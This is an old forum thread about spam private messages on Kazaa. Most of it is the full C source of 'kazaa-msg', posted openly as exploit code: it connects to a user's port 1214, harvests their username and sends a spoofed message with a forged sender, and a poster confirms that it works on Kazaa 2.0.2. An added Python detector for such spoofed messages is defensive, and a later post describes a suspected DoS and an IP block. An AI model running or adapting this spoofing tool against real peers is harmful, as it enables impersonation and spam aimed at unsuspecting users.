Kazaa Pm Spam
Posted by: random nut
I just got this spam, I'm sure more will follow so beware of coming spam:
hi
Free Mp3 Download and LISTEN
Hip Hop - Pop - House - Trance - Rock - Nostalgie Charts
All new Songs
www.CENSORED.com
It was sent as a PM, probably automated. A couple of days ago I wondered why no-one had written a Kazaa spammer... I was wrong; someone already has, it seems.
Posted by: ugluk
man, thats bad news. :angry: :(
Posted by: Rocko
Exploit code (Message spoofing):

/* kazaa-msg.c code
 *
 * Filename : kazaa-msg.c
 * Version  : 0.1
 * Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
 * Date     : 9/2/2K2
 * Abstract : Send a message to any kazaa, grokster and morpheus user,
 *            knowing their ip/hostname. Programmed for hackindex team.
 *            http://www.hackindex.com
 *
 * Compile: #gcc -o kazaa-msg kazaa-msg.c
 *
 * Usage:   #./kazaa-msg host/ip message
 *
 * Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
 *
 * This will send a message to given kazaa user (host). Actually this is
 * just a proof of concept. Required fields to send a message are:
 *
 *   X-Kazaa-Username
 *   X-Kazaa-Network
 *
 *     These will form the "FROM" : name@network
 *     modify the id_ and minetwork defines to change "FROM" field.
 *
 *   X-Kazaa-IMTo                 "TO" field. Remote kazaa's login
 *                                (kazaa, grokster, morpheus)
 *                                It's retrieved from a first connection to
 *                                host.
 *   X-Kazaa-IMType user_text     Type of data (fixed)
 *   X-Kazaa-IMData               Message radix64 encoded.
 *
 * For grokster (tested) and morpheus (not tested) the name of the fields
 * in the HTTP header are the same.
 *
 * If you want to receive any answer from the remote user, you must open
 * a tcp socket listening on port 1214. HTTP header will be the same, and
 * message must be decoded using Radix64 algorithm.
 *
 * License conditions:
 *
 * Copyright (c) 2002 mrjade - <mrjade@softhome.net>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 *
 *
 * Other Copyright:
 *
 *   radix64 encode table and enc64() by Carl M. Ellison
 *
 * NOTES:
 *   Not tested at all.. it may be bugged.
 */

/* ---== Include section ==--- */
#include <sys/types.h>
#include <sys/socket.h>  /* socket(), connect(), send(), recv() */
#include <netinet/in.h>  /* struct sockaddr_in, htons() */
#include <netdb.h>       /* gethostbyname() */
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* close() */
#include <stdio.h>       /* printf(), fflush() */
#include <stdlib.h>      /* malloc(), exit() */
#include <string.h>      /* strstr(), strchr(), memcpy(), strcat() */
#include <strings.h>     /* bzero() */

/* ---== Defines section ==--- */
/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_        "admin"      /* Default id for sending msg */
#define minetwork  "hackindex"  /* Default network for sending msg */
#define PORT       1214         /* Default port for sending data */

/* ---== Global variables ==--- */
char enctab[64] = { /* radix64 encoding table */
    'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
    'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
    'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
    'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
};

/* ---== Procedure section ==--- */

/* Usage Banner.. */
void usage(char *pname) {
    printf(" :: Usage : %s ip/host mensaje\n", pname);
    fflush(stdout);
    exit(-1);
}

/* Resolve hostname (dotted quad or DNS name) to a network-order address, 0 on failure */
in_addr_t resol(char *host) {
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host)) == INADDR_NONE) {
        printf(" :: Resolving host: %s\n", host);
        if (!(host_ent = gethostbyname(host))) return 0;
        memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
    }
    return addr.s_addr;
}

/* Return the value following 'token' in buffer, terminated in place.
 * Assumes CRLF line endings: the byte before the '\n' (the '\r') is zeroed. */
char *get_token(char *buffer, char *token) {
    char *stri, *strf;

    if ((stri = strstr(buffer, token))) {
        stri = stri + strlen(token);
        strf = strchr(stri, 0xA);
        if (!strf) return NULL;   /* header line not terminated */
        strf[-1] = 0;
    } else {
        return NULL;
    }
    return stri;
}

/* radix64 (base64) encoder, by Carl M. Ellison */
void enc64(char *outbuff,           /* output buffer */
           long out_lth,            /* allocated length of the output buffer */
           long *polth,             /* actual length of output */
           unsigned char *inbuff,   /* input (binary) buffer */
           long inb_lth,            /* length of inbuff */
           long line_lth,           /* maximum line lth (-1 means infinite) */
           long n_space)            /* # spaces at start of each text line */
{
    long nl;            /* # chars left in this line */
    unsigned char *b;   /* walking input pointer (unsigned so >> does not sign-extend) */
    char *c;            /* walking output pointer */

    nl = line_lth;
    b = inbuff;
    c = outbuff;
    while ((inb_lth > 0) && (out_lth > 5)) {
        /* encoding */
        c[0] = enctab[(b[0] >> 2) & 0x3f];
        c[1] = enctab[((b[0] & 0x3) << 4) | ((b[1] >> 4) & 0xf)];
        c[2] = enctab[((b[1] & 0xf) << 2) | ((b[2] >> 6) & 0x3)];
        c[3] = enctab[b[2] & 0x3f];
        out_lth -= 4;               /* count the code bytes */
        switch (inb_lth) {          /* take care of the final bytes */
        case 1: c[2] = '=';         /* only 1, so == (falls through) */
        case 2: c[3] = '=';         /* 2, so = */
            inb_lth = 0;            /* either way, we're done */
            c += 4;                 /* but no spaces */
            *(c++) = '\n';          /* and there's an end of line */
            break;
        default:
            inb_lth -= 3;
            b += 3;
            c += 4;
            nl -= 4;
            if (nl <= 0) {
                long i;
                *(c++) = '\n';
                nl = line_lth;
                for (i = 0; i < n_space; i++)
                    *(c++) = ' ';
                out_lth -= 1 + n_space;
            }
            break;
        } /* switch */
    } /* while */
    *polth = c - outbuff;
} /* enc64 */

/* ---== MAIN Procedure ==--- */
int main(int argc, char *argv[]) {
    int sock, c_, cont;
    char *host;
    struct sockaddr_in TheHoSt;
    char *btmp;
    char *user_name, *id;        /* user_name = id = remote user name */
    char *user_net, *network;    /* user_net = network = remote user network */
    char *msg, *msgr64;          /* Radix 64 stuff */
    long olth;                   /* Radix 64 stuff */
    char buffer[512];            /* Rec. buffer */

    printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
    printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");
    if (argc < 3) {
        usage(argv[0]);
    }

    /* Host resolve and connect */
    host = argv[1];
    bzero(&TheHoSt, sizeof(TheHoSt));
    TheHoSt.sin_family = AF_INET;
    TheHoSt.sin_addr.s_addr = resol(host);
    if (!TheHoSt.sin_addr.s_addr) {
        printf(" :: ERROR: host not found.\n\n");
        exit(-1);
    }

    /* We must get remote user name, need it to send any request */
    TheHoSt.sin_port = htons(PORT);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        printf(" :: ERROR: Can't open socket\n\n");
        exit(-1);
    }
    bzero(buffer, sizeof(buffer));
    if (!connect(sock, (struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
        printf(" ::\n :: Getting username@network: "); fflush(stdout);
        /* Search for username@userdomain on host */
        send(sock, http_basic, strlen(http_basic), 0);
        recv(sock, buffer, sizeof(buffer) - 1, 0);   /* keep a terminating NUL */
        close(sock);
        if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))) {
            printf("%s@%s\n", user_name, user_net); fflush(stdout);
        } else {
            printf("ERR\n :: No username or network detected\n\n"); fflush(stdout);
            exit(-1);
        }
        /* Storing strings */
        network = malloc(strlen(user_net) + 1);
        bzero(network, strlen(user_net) + 1);
        memcpy(network, user_net, strlen(user_net));
        id = malloc(strlen(user_name) + 1);
        bzero(id, strlen(user_name) + 1);
        memcpy(id, user_name, strlen(user_name));
    } else {
        printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
        exit(-1);
    }

    /* Now send the message request */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        printf(" :: ERROR: Can't open socket\n\n");
        exit(-1);
    }
    bzero(buffer, sizeof(buffer));
    if (!connect(sock, (struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
        printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork); fflush(stdout);
        /* Get msg length: each argument plus one separating space */
        cont = 2; c_ = 0;
        while (cont < argc) {
            c_ = c_ + strlen(argv[cont++]) + 1;
        }
        /* Allocate buffer: c_ text bytes, the terminating NUL, and slack for
         * enc64's 3-byte read-ahead on the final group */
        msg = malloc(c_ + 3);
        bzero(msg, c_ + 3);
        /* Store msg in buffer */
        cont = 2;
        while (cont < argc) {
            strcat(msg, argv[cont]);
            strcat(msg, " ");
            cont++;
        }
        /* Output buffer for radix64 conv (4/3 expansion plus padding and newline) */
        msgr64 = malloc(2 * c_ + 8);
        bzero(msgr64, 2 * c_ + 8);
        /* Convert msg to radix 64 */
        enc64(msgr64, 2 * c_ + 8, &olth, (unsigned char *)msg, c_, 9999, 0);
        /* Store in buffer */
        c_ = strlen(msgr64) + strlen(kazaa_head) + strlen(id_) + strlen(id) + strlen(minetwork) + 3;
        btmp = malloc(c_);
        bzero(btmp, c_);
        sprintf(btmp, kazaa_head, id_, minetwork, id, msgr64);
        send(sock, btmp, strlen(btmp), 0);
        while ((recv(sock, buffer, sizeof(buffer) - 1, 0) != -1) && (buffer[0] != 0)) {
            if (strstr(buffer, "200")) {   /* HTTP OK */
                printf(" :: Message sent.\n\n");
                close(sock);
                exit(0);
            }
            bzero(buffer, sizeof(buffer)); /* Clear Buffer */
        }
        printf(" :: Can't deliver message\n\n\n\n");
    } else {
        close(sock);
        printf(" :: Can't connect. Service unavailable.\n\n");
        exit(-1);
    }
    close(sock);   /* Remote host will close it when finished */
    return -1;
}
Check http://www.securiteam.com/exploits/5RP0R1P6AC.html
Rocko
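The header comment above is effectively a protocol description: a PM is a GET /.message request on port 1214 whose X-Kazaa-Username and X-Kazaa-Network form the From field, X-Kazaa-IMTo names the recipient, X-Kazaa-IMType is fixed to user_text, and X-Kazaa-IMData carries the text in radix64 (which is ordinary base64). The following detector is an added example, not part of the thread or of the kazaa-msg tool: it parses such a request, decodes the message, and flags the things a defender watching port 1214 would care about (missing fields, a message body advertising a URL, and the tool's own "UserAgent:" header spelled without a hyphen, which is assumed here to differ from what a genuine client sends). The sample requests, the example.com URL standing in for the censored one, and the build_im helper are all constructed for the example.

```python
"""Detector for spoofed/spam Kazaa private messages carried as HTTP requests on port 1214.

Added example (not from the forum thread or the kazaa-msg tool). It models the request
layout described in the tool's header comment. All sample requests are constructed.
"""
import base64
import binascii
import re
from typing import Optional

URL_RE = re.compile(r"(?:https?://|www\.)\S+", re.IGNORECASE)
REQUIRED = ("x-kazaa-username", "x-kazaa-network", "x-kazaa-imto", "x-kazaa-imdata")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP-style request into its request line and a lower-cased header map."""
    text = raw.decode("latin-1")
    head = text.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    request_line = lines[0].strip() if lines else ""
    headers = {}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"request": request_line, "headers": headers}


def decode_radix64(value: str) -> Optional[str]:
    """Decode the IMData field; the tool's 'radix64' is plain base64 with '=' padding."""
    compact = "".join(value.split())   # the encoder may wrap lines
    try:
        return base64.b64decode(compact).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def analyze_pm(raw: bytes) -> dict:
    """Classify one request: is it an IM, who claims to send it, and why it looks suspicious."""
    req = parse_request(raw)
    h = req["headers"]
    result = {"is_im": req["request"].startswith("GET /.message"), "sender": None,
              "recipient": None, "message": None, "findings": []}
    if not result["is_im"]:
        return result
    findings = result["findings"]
    for field in REQUIRED:
        if field not in h:
            findings.append(f"missing header {field}")
    result["sender"] = f"{h.get('x-kazaa-username', '?')}@{h.get('x-kazaa-network', '?')}"
    result["recipient"] = h.get("x-kazaa-imto")
    if h.get("x-kazaa-imtype", "") != "user_text":
        findings.append("unexpected X-Kazaa-IMType")
    # The posted tool emits 'UserAgent:' without a hyphen. Assumption: genuine clients
    # send 'User-Agent:', so the unhyphenated spelling is a cheap fingerprint of the tool.
    if "useragent" in h and "user-agent" not in h:
        findings.append("UserAgent header without hyphen (kazaa-msg fingerprint)")
    body = decode_radix64(h.get("x-kazaa-imdata", ""))
    result["message"] = body
    if body is None:
        findings.append("IMData is not valid radix64")
    elif URL_RE.search(body):
        findings.append("message body advertises a URL")
    return result


def build_im(sender: str, network: str, to: str, text: str, agent_header: str = "User-Agent") -> bytes:
    """Construct a request in the layout the tool uses (helper for the constructed samples)."""
    data = base64.b64encode(text.encode("latin-1")).decode("ascii")
    return (f"GET /.message HTTP/1.1\nHost: localhost\n{agent_header}: KazaaClient\n"
            f"X-Kazaa-Username: {sender}\nX-Kazaa-Network: {network}\nConnection: close\n"
            f"X-Kazaa-IMTo: {to}\nX-Kazaa-IMType: user_text\nX-Kazaa-IMData: {data}\n\n").encode("latin-1")


# Constructed samples: a spam PM like the one in the thread (URL replaced by example.com,
# From set to the tool's defaults), a benign PM, and a plain GET probe that is not an IM.
SPAM_PM = build_im("admin", "hackindex", "victim_user",
                   "Free Mp3 Download and LISTEN - All new Songs www.example.com",
                   agent_header="UserAgent")
BENIGN_PM = build_im("bob", "kazaa", "victim_user", "hi, is that album still shared?")
PROBE = b"GET / HTTP/1.0\nHost: localhost\n\n"

if __name__ == "__main__":
    for label, sample in (("spam", SPAM_PM), ("benign", BENIGN_PM), ("probe", PROBE)):
        r = analyze_pm(sample)
        print(label, r["sender"], r["recipient"], r["findings"])
```

Feeding captured port-1214 requests to analyze_pm gives the claimed sender, the recipient and the decoded text in one place; because the From field is just two client-supplied headers, the sender string is never evidence of origin, and the peer's IP address is the only thing worth blocking, as ToraBoraDweller does further down the thread.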
Posted by: random nut
Does that code work with Kazaa v2.0.0 or v2.0.2 or have they fixed that? The link you gave has been fixed but the above code doesn't seem to be the exact same code as the link.
Posted by: Rocko
Originally posted by random nut@28 January 2003 - 17:38
Does that code work with Kazaa v2.0.0 or v2.0.2 or have they fixed that? The link you gave has been fixed but the above code doesn't seem to be the exact same code as the link.
Yes it is, but that page has two codes: one for the DoS attack and, below it, the code I posted for sending PMs.
And it does work on Kazaa 2.0.2.
Rocko
Posted by: ToraBoraDweller
:o I recently had a DoS attack (or attempt).
First I thought it was a portscan; I looked with TCPView
and saw this IP: 194.109.18.2
The DNS name looked like this: Cache.P2P !!!
whois revealed this :% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 194.109.18.0 - 194.109.18.7
netname: NETLINK
descr: Netlink BV
country: NL
admin-c: EM506-RIPE
tech-c: EM506-RIPE
tech-c: CB127
tech-c: OD45
status: ASSIGNED PA
Remedy: added the IP range to the blocked zone in the firewall.
btw I still do not know what they really were attempting;
it slowed my internet traffic only by about 30% ??
